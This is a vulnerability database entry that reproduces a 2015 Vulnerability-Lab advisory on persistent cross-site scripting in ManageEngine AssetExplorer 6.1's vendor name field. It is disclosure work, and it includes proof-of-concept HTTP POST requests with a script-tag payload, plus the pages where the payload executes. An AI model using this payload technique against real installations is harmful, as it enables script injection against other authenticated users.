ManageEngine Asset Explorer v6.1 - Persistent Vulnerability
2015-06-22T00:00:00
ID VULNERABLE:1488 Type vulnerlab Reporter Alain Homewood - PwC New Zealand (http://www.pwc.co.nz/services/assurance-services/pwc-security/) Modified 2015-06-22T00:00:00
{"id": "VULNERABLE:1488", "vendorId": null, "type": "vulnerlab", "bulletinFamily": "exploit", "title": "ManageEngine Asset Explorer v6.1 - Persistent Vulnerability", "description": "", "published": "2015-06-22T00:00:00", "modified": "2015-06-22T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.vulnerability-lab.com/get_content.php?id=1488", "reporter": "Alain Homewood - PwC New Zealand (http://www.pwc.co.nz/services/assurance-services/pwc-security/)", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-12-20T07:37:00", "viewCount": 2, "enchantments": {"dependencies": {}, "score": {"value": -0.1, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.1}, "sourceData": "Document Title:\r\n===============\r\nManageEngine Asset Explorer v6.1 - Persistent Vulnerability\r\n\r\n\r\nReferences (Source):\r\n====================\r\nhttp://www.vulnerability-lab.com/get_content.php?id=1488\r\n\r\n\r\nRelease Date:\r\n=============\r\n2015-06-22\r\n\r\n\r\nVulnerability Laboratory ID (VL-ID):\r\n====================================\r\n1488\r\n\r\n\r\nCommon Vulnerability Scoring System:\r\n====================================\r\n3.5\r\n\r\n\r\nProduct & Service Introduction:\r\n===============================\r\nManageEngine AssetExplorer is a web-based IT Asset Management (ITAM) software that helps you monitor and manage assets in your \r\nnetwork from Planning phase to Disposal phase. AssetExplorer provides you with a number of ways to ensure discovery of all the \r\nassets in your network. You can manage software & hardware assets, ensure software license compliance and track purchase orders \r\n& contracts - the whole nine yards! AssetExplorer is very easy to install and works right out of the box.\r\n\r\n(Copy of the Vendor Homepage: https://www.manageengine.com/products/asset-explorer/ )\r\n\r\n\r\nAbstract Advisory Information:\r\n==============================\r\nAn independent vulnerability laboratory researcher discovered an application-side cross site scripting web vulnerability in the official ManageEngine v6.1 Asset Explorer web-application.\r\n\r\n\r\nVulnerability Disclosure Timeline:\r\n==================================\r\n2015-06-22:\tPublic Disclosure (Vulnerability Laboratory)\r\n\r\n\r\nDiscovery Status:\r\n=================\r\nPublished\r\n\r\n\r\nAffected Product(s):\r\n====================\r\nManage Engine\r\nProduct: Asset Explorer - Web Application 6.1.0 (Build 6112)\r\n\r\n\r\nExploitation Technique:\r\n=======================\r\nRemote\r\n\r\n\r\nSeverity Level:\r\n===============\r\nLow\r\n\r\n\r\nTechnical Details & Description:\r\n================================\r\nAn authenticated user with permissions to add new vendors can insert a cross site scripting payload into the vendor name field. This payload is then executed whenever any authenticated user visits either:\r\n1.1 The edit page for the malicious vendor\r\n1.2 The view contract page for a contract that is assigned to a malicious vendor\r\n\r\nVulnerable Product(s):\r\nManageEngine Asset Explorer\r\n\r\nAffected Version(s):\r\nVersion 6.1.0 / Build Number 6112\r\n(Earlier versions are likely also affected)\r\n\r\nVulnerability Type(s):\r\nPersistent Cross Site Scripting\r\n\r\n\r\nProof of Concept (PoC):\r\n=======================\r\nThe persistent cross site scripting web vulnerability can be exploited by remote attackers with low privileged application user account and low user interaction.\r\nFor security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.\r\n\r\nThe cross site scripting payload is added by an authenticated user through a POST request to endorDef.do. The payload is then executing via GET requests to VenderDef.do or ContractDef.do.\r\n\r\nPoC: The payload is added by a POST request to VendorDef.do:\r\n\r\n\tPOST /VendorDef.do HTTP/1.1\r\n\tHost: [VULNERABLE]:8080\r\n\tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n\tAccept-Language: en-US,en;q=0.5\r\n\tAccept-Encoding: gzip, deflate\r\n\tReferer: http://[VULNERABLE]:8080/VendorDef.do?toShowView=addForm\r\n\tCookie: JSESSIONID=D44D55DB9E14A3EA1A1F478BD506CD9D; 2Homehelpexp=helpexpshow; 2Homehelpcoll=helpcollhide; nonitassetslinks=hide; Components=hide; virtual=hide; viewlinks=hide; Softwarediv=hide; itassetslinks=show; swHomeDefaultMfg=-1; swHomeDefaultSite=-1; swHomeGraph=sdp.inventory.home.softwaremetering.rarely; [object HTMLTableRowElement]=show; [object HTMLDivElement]=show; [object HTMLTableCellElement]=show; JSESSIONIDSSO=FA5EBD2894D00C9FB4C3192C85FF96CC\r\n\tConnection: keep-alive\r\n\tContent-Type: application/x-www-form-urlencoded\r\n\tContent-Length: 293\r\n\titemID=&divToShow=detView&toShow=&organizationName=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&vendorCurrency=2&organizationDesc=&contactPerson=&doorNumber=&street=&landmark=&city=&postalCode=&state=&country=&organizationEmail=&organizationPhone=&organizationFax=&organizationUrl=&addButton=Save\r\n\r\nPoC: Payload(s)\r\n<script>alert(123)</script>\r\n\r\nNote: The payload is then executed when visiting the following pages as an authenticated user:\r\n\r\nEdit vendor page:\r\nhttp://[VULNERABLE]:8080/VendorDef.do?mode=edit&id=3\r\n\r\nView contract page:\r\nhttp://[VULNERABLE]:8080/ContractDef.do?contractID=1\r\n\r\nNote: The second exploit vector requires the extra step of associated the contract with a vendor through a POST request to ContractDef.do:\r\n\r\n\tPOST /ContractDef.do HTTP/1.1\r\n\tHost: [VULNERABLE]:8080\r\n\tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n\tAccept-Language: en-US,en;q=0.5\r\n\tAccept-Encoding: gzip, deflate\r\n\tReferer: http://[VULNERABLE]:8080/ContractDef.do?coMode=editCO&cID=1\r\n\tCookie: JSESSIONID=D44D55DB9E14A3EA1A1F478BD506CD9D; 2Homehelpexp=helpexpshow; 2Homehelpcoll=helpcollhide; nonitassetslinks=hide; Components=hide; virtual=hide; viewlinks=show; Softwarediv=hide; itassetslinks=hide; swHomeDefaultMfg=-1; swHomeDefaultSite=-1; swHomeGraph=sdp.inventory.home.softwaremetering.rarely; [object HTMLTableRowElement]=show; [object HTMLDivElement]=show; [object HTMLTableCellElement]=show; JSESSIONIDSSO=FA5EBD2894D00C9FB4C3192C85FF96CC\r\n\tConnection: keep-alive\r\n\tContent-Type: application/x-www-form-urlencoded\r\n\tContent-Length: 317\r\n\tcontractMode=\u00acifyUsers=&contractName=test+contract&contractID=1&createdBy=2&categoryID=1&parentID=&vendorID=4&custContractID=123&comments=&supportDetails=&selectedAsset=\u00a4tDate=2015-05-01&fromDate=2015-04-29&toDate=2015-10-02&totalPrice=0.00\u00acifyMailIds=\u00acifyDay=&beforeDays=&selected=&updateContract=Save\r\n\t\r\nReference(s):\r\nhttp://[VULNERABLE]:8080/VendorDef.do?toShowView=addForm\r\nhttp://[VULNERABLE]:8080/ContractDef.do?coMode=editCO&cID=1\r\nhttp://[VULNERABLE]:8080/VendorDef.do?mode=edit&id=3\r\nhttp://[VULNERABLE]:8080/ContractDef.do?contractID=1\r\n\r\n\r\nSecurity Risk:\r\n==============\r\nThe security risk of the (persistent) application-side input validation web vulnerability is estimated as medium. (CVSS 3.5)\r\n\r\n\r\nCredits & Authors:\r\n==================\r\nAlain Homewood - PwC New Zealand (http://www.pwc.co.nz/services/assurance-services/pwc-security/)\r\n\r\n\r\nDisclaimer & Information:\r\n=========================\r\nThe information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed \r\nor implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable \r\nin any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab \r\nor its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for \r\nconsequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, \r\npolicies, deface websites, hack into databases or trade with fraud/stolen material.\r\n\r\nDomains: www.vulnerability-lab.com \t- www.vuln-lab.com\t\t\t \t\t- www.evolution-sec.com\r\nContact: admin@vulnerability-lab.com \t- research@vulnerability-lab.com \t \t\t- admin@evolution-sec.com\r\nSection: magazine.vulnerability-db.com\t- vulnerability-lab.com/contact.php\t\t \t- evolution-sec.com/contact\r\nSocial:\t twitter.com/#!/vuln_lab \t\t- facebook.com/VulnerabilityLab \t \t\t- youtube.com/user/vulnerability0lab\r\nFeeds:\t vulnerability-lab.com/rss/rss.php\t- vulnerability-lab.com/rss/rss_upcoming.php \t\t- vulnerability-lab.com/rss/rss_news.php\r\nPrograms: vulnerability-lab.com/submit.php \t- vulnerability-lab.com/list-of-bug-bounty-programs.php\t- vulnerability-lab.com/register/\r\n\r\nAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to \r\nelectronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by \r\nVulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website \r\nis trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact \r\n(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.\r\n\r\n\t\t\t\tCopyright \u00a9 2015 | Vulnerability Laboratory - [Evolution Security GmbH]\u2122\r\n\r\n\r\n\r\n", "category": "Web Application Vulnerabilities", "_state": {"dependencies": 1646206163}}